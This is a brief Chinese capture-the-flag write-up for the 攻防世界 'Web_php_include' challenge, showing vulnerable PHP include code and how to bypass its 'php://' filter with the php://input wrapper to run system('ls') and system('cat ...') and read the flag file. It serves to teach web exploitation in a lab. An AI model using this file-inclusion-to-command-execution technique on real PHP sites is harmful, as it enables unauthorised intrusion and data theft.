Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
曲幽2 小时前
FastAPI + Vue 前后端分离实战:我的项目结构“避坑指南”
python·vue·fastapi·web·vite·proxy·cors·env
johnny2333 小时前
Web分析平台:Web Check、LogX、IP Insight
web
REDcker3 小时前
WebXR 技术详解:标准、生态与开发入门
浏览器·web
数据知道12 小时前
claw-code 源码详细分析:Route / Bootstrap / Tool-Pool——把提示词映射到「可执行面」的分层策略
网络·ai·web·claude code
数据知道1 天前
claw-code 源码详细分析:Parity Audit——如何用工程对比把「像不像」从口水战变成可重复报告?
ai·web·claw code
祁白_2 天前
Bugku:备份是一个好习惯
笔记·学习·web安全·ctf
糕冷のkecy2 天前
[ZJCTF 2019]NiZhuanSiWei
web
数据知道2 天前
claw-code 源码分析:权限拒绝不是补丁——工具调用链上如何做 `PermissionDenial` 级设计才像成熟产品?
ai·web·claw code
蒲公英eric3 天前
攻防世界 misc题GFSJ0403-【intoU】
ctf·misc·攻防世界·音频题